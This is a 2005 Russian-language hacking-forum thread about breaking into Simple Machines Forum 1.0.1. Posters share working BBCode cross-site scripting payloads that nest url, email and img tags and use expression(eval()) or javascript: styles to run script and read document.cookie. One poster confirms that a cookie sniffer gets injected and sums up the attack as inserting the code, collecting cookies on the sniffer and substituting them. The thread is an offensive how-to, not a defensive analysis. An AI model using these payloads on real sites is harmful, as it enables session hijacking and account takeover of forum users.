SMF 1.0.1. (Simple Machines Forum)

Discussion in 'Уязвимости' started by FST, 2 Apr 2005.

  1. FST

    FST New Member

    Joined:
    5 Feb 2005
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    Ломаю голову уже какой день и никак дыру найти не могу :( Может кто-то уже сталкивался? Вот пример форума. Этот форум ломать не обязательно :D
     
  2. KEZ

    KEZ Guest

    Reputations:
    0
    Дай мне линк на исходники
     
  3. fahrenheit

    fahrenheit New Member

    Joined:
    20 Mar 2005
    Messages:
    3
    Likes Received:
    1
    Reputations:
    0
  4. fahrenheit

    fahrenheit New Member

    Joined:
    20 Mar 2005
    Messages:
    3
    Likes Received:
    1
    Reputations:
    0
    Чего то и мне ломаку стало интересно поискать уязвимость )
    Это же какое счатье потом если найдеш))
     
  5. KEZ

    KEZ Guest

    Reputations:
    0
    Мда... ну и форум.
    В первыем минуты мне показалось что он сверх-защищеный. (по обилию тегов)

    Через 2 минуты я уже выделил две самых простых XSS. Их хватит. Если нет - берите ещё. Я сделаю видео.

    Code:
    [urл=http://a[еmail=s=`]a[/еmail]]a[/urл]`xss=`alert(document.cookie);this.xss=null` 
    style=top:expression(eval(this.xss));
    
    [iмg]http://[urл=http://s=`]aaaaa[/urл][/iмg]`xss=`alert(document.cookie);this.xss=null` 
    style=top:expression(eval(this.xss));
    
    ВНИМАНИЕ! Чтобы НАШ ФОРУМ не парсил (не зависимо от тега [СODE]) мой код, я НАМЕРЕННО написал URL через Л. И емейл тоже так написал.
    ПЕРЕПИШИТЕ САМИ!
     
  6. Algol

    Algol New Member

    Joined:
    29 May 2002
    Messages:
    1,759
    Likes Received:
    4
    Reputations:
    0
    Спаренные теги в правильном исполнении:
    HTML:
    [img]http://s.d[email]sa@sa/style=background:url(javascript:alert());[/img][/email]
    
     
  7. Algol

    Algol New Member

    Joined:
    29 May 2002
    Messages:
    1,759
    Likes Received:
    4
    Reputations:
    0
    Кстати, ты зря везде пихаешь знак `.
    Ведь он прокатывает только в IE.
    Если можно обойтись без него, то лучше его не использовать.
     
    #7 Algol, 2 Apr 2005
    Last edited by a moderator: 2 Apr 2005
  8. KEZ

    KEZ Guest

    Reputations:
    0
    Ну... это как сказать.
    У меня все правильно. И снифер вставляется. Я проверял.
    Расчитано на то что Ie. Сейчас большинство его используют
    Так что нельзя назвать мое исполнение неправильным
     
    #8 KEZ, 2 Apr 2005
    Last edited by a moderator: 2 Apr 2005
  9. FST

    FST New Member

    Joined:
    5 Feb 2005
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    Во, да ты дайшь басу :D :D Буду ждать ролик! Респект. Я день потратил и ничего не нашёл :(

    Ссылочку на видео не забудь оставить :rolleyes:
     
  10. FST

    FST New Member

    Joined:
    5 Feb 2005
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    Гррр, что-то я видео ролика обещенного не вижу !
     
  11. KEZ

    KEZ Guest

    Reputations:
    0
    А зачем ролик? Вставляй код. Жди куки на снифере и подменяй.